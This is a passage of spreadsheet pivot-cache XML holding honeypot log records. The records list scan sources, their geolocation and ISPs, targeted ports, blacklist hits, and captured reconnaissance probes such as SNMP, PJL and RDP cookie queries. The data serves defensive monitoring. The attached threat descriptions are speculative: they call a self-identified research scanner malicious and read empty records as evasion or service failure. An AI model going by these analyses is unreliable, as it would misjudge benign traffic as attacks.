    <d v="2024-12-30T09:34:00"/>
    <d v="2025-04-30T10:46:38"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:9ea6"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="189"/>
    <x v="189"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:43:25"/>
    <d v="2024-03-19T04:01:40"/>
    <d v="2025-04-30T10:43:25"/>
    <n v="129"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SIP_H46&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_MYSQL_H21&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_POSTGRES_H25&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SNMP_H9&amp;&amp;SMA-LAB_MYSQL_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;1521&amp;&amp;6379&amp;&amp;1433&amp;&amp;NA&amp;&amp;23&amp;&amp;161&amp;&amp;6067&amp;&amp;5432&amp;&amp;3389&amp;&amp;21&amp;&amp;143&amp;&amp;389&amp;&amp;5900&amp;&amp;9100&amp;&amp;1080&amp;&amp;62278&amp;&amp;445&amp;&amp;80&amp;&amp;51499"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2021-12-20"/>
    <s v="PAN-22"/>
    <s v="2021-12-20"/>
    <s v="connection&amp;&amp;command&amp;&amp;query&amp;&amp;NA&amp;&amp;stshash&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mgYbqwQhK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HFVtMy'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HQsdxY'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.35,61720)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.35,61722)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.35,61732)}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.35,63148)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c6eb:1823"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Possible brute-force attack attempt, where an attacker is trying to guess credentials for PJL service access without success."/>
    <s v="SMB Scanning &amp;&amp; SMB Scanning"/>
  </r>
  <r>
    <x v="190"/>
    <x v="190"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:39:24"/>
    <d v="2025-04-30T10:38:32"/>
    <d v="2025-04-30T10:39:24"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ee4:d17c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="191"/>
    <x v="191"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:36:10"/>
    <d v="2024-04-18T12:06:45"/>
    <d v="2025-04-30T10:36:10"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="28923&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NIB"/>
    <s v="2007-08-01"/>
    <s v="BSNLNET"/>
    <s v="None"/>
    <s v="None"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:ae0c"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="192"/>
    <x v="192"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:34:58"/>
    <d v="2023-07-24T21:20:23"/>
    <d v="2025-04-30T10:34:58"/>
    <n v="1878"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Email Spoofing"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_SSH_H1&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_ORACLE_H9&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_SIP_H30&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_IRC_H26&amp;&amp;SMA-LAB_RDP_H40&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_NTP_H13&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_POP3_H30&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_SNMP_H38&amp;&amp;SMA-LAB_POP3_H7&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_PJL_H13&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_MSSQL_H19&amp;&amp;SMA-LAB_MYSQL_H8&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_SIP_H8&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_IMAP_H3&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_RDP_H24&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_NTP_H11&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_SIP_H6&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_NTP_H9&amp;&amp;SMA-LAB_MSSQL_H12&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_SNMP_H37"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;35225&amp;&amp;1521&amp;&amp;23&amp;&amp;6379&amp;&amp;22&amp;&amp;36512&amp;&amp;80&amp;&amp;389&amp;&amp;55424&amp;&amp;143&amp;&amp;NA&amp;&amp;445&amp;&amp;29787&amp;&amp;6667&amp;&amp;3389&amp;&amp;51301&amp;&amp;110&amp;&amp;1433&amp;&amp;51107&amp;&amp;9100&amp;&amp;161&amp;&amp;3306&amp;&amp;5900&amp;&amp;5432&amp;&amp;52085&amp;&amp;443&amp;&amp;52416&amp;&amp;51766&amp;&amp;50392&amp;&amp;21&amp;&amp;53923&amp;&amp;52165&amp;&amp;52539&amp;&amp;1080&amp;&amp;53359&amp;&amp;52121&amp;&amp;55456"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="103"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2023-09-07"/>
    <s v="PAN-22"/>
    <s v="2023-09-07"/>
    <s v="query&amp;&amp;connection&amp;&amp;stshash&amp;&amp;command&amp;&amp;request&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mngtKmTvb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YxKzQx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GrYLDZ'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HiZYUJmOW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VmYWYU'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aMwXNZ'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fzsSJkRns'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CLLlzY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BlHWDp'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nSXgCNfcX'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wXOnpq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cjwJCa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MeghWsaTt'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cAgvtR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HNBsEP'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:8457"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The server is unable to synchronize its clock due to an unknown issue with the NTP (Network Time Protocol) service, potentially indicating a network problem or service disruption. This could be a sign of underlying issues rather than malicious activity itself but warrants further investigation as it may have been exploited by attackers for their own purposes. &amp;&amp; No data received for FTP service, indicating possible lack of interaction or malicious activity attempting to evade detection. This could be an attempt to gather information about the system without initiating a connection. It may also indicate a sophisticated attacker trying to remain undetected. &amp;&amp; The log indicates an attempt to connect or interact with an IMAP service without any specified action or error, suggesting potential reconnaissance or probing activity. The lack of specific information may indicate the attacker is testing for vulnerabilities or checking if the service is online. This could be a precursor to more malicious activities. &amp;&amp; Malicious actor is attempting to access Redis service, possibly to steal data or gain unauthorized control. The actor's intentions are unclear as no credentials were provided. This may be a reconnaissance attempt to identify available services on the network. &amp;&amp; Malicious actor attempting to identify capabilities of targeted service, possibly preparing for exploitation or unauthorized access. _x000a_This is a reconnaissance phase to understand the service's features and limitations. _x000a_The actor may be mapping out potential entry points for future attacks."/>
    <s v="IMAP Attack &amp;&amp; Scanning Probe"/>
  </r>
  <r>
    <x v="193"/>
    <x v="193"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:29:45"/>
    <d v="2025-04-30T10:29:45"/>
    <d v="2025-04-30T10:29:45"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="79"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:1509"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="194"/>
    <x v="194"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:27:45"/>
    <d v="2024-12-12T10:06:50"/>
    <d v="2025-04-30T10:27:45"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;51653&amp;&amp;51692"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kabupaten Bangkalan"/>
    <s v="Bangkalan"/>
    <s v="1650298"/>
    <s v="NA"/>
    <s v="-7.04754"/>
    <s v="112.736"/>
    <s v="141911"/>
    <s v="Dinas Komunikasi dan Informatika Kabupaten Bangkalan"/>
    <s v="Dinas Komunikasi dan Informatika Kabupaten Bangkalan"/>
    <s v="business"/>
    <s v="Dinas Komunikasi dan Informatika Kabupaten Bangkalan"/>
    <s v="2021-03-23"/>
    <s v="IDNIC-DISKOMINFO-BANGKALAN-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a4:b46a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="195"/>
    <x v="195"/>
    <s v="NA&amp;&amp;cm222-166-250-21.hkcable.com.hk"/>
    <x v="0"/>
    <d v="2025-04-30T10:25:55"/>
    <d v="2025-02-28T08:28:54"/>
    <d v="2025-04-30T10:25:55"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NTW"/>
    <s v="Tsuen Wan"/>
    <s v="NA"/>
    <s v="Chai Wan Kok"/>
    <s v="1820001"/>
    <s v="NA"/>
    <s v="22.3728"/>
    <s v="114.107"/>
    <s v="9908"/>
    <s v="Hong Kong Cable Television Limited"/>
    <s v="Hong Kong Cable Television Limited"/>
    <s v="residential"/>
    <s v="Hong Kong Cable TV Ltd - Cable Multi-Media Services"/>
    <s v="2004-04-21"/>
    <s v="HKCABLE-HK"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dea6:fa15"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="196"/>
    <x v="196"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:25:24"/>
    <d v="2025-03-26T05:35:07"/>
    <d v="2025-04-30T10:25:24"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="RO"/>
    <s v="Romania"/>
    <s v="B"/>
    <s v="București"/>
    <s v="Municipiul Bucureşti"/>
    <s v="Bucharest"/>
    <s v="683506"/>
    <s v="NA"/>
    <s v="44.4268"/>
    <s v="26.1025"/>
    <s v="41496"/>
    <s v="TV SAT 2002 SRL"/>
    <s v="TV SAT 2002 SRL"/>
    <s v="residential"/>
    <s v="TVSAT Fiber"/>
    <s v="2007-02-15"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4d51:42c8"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
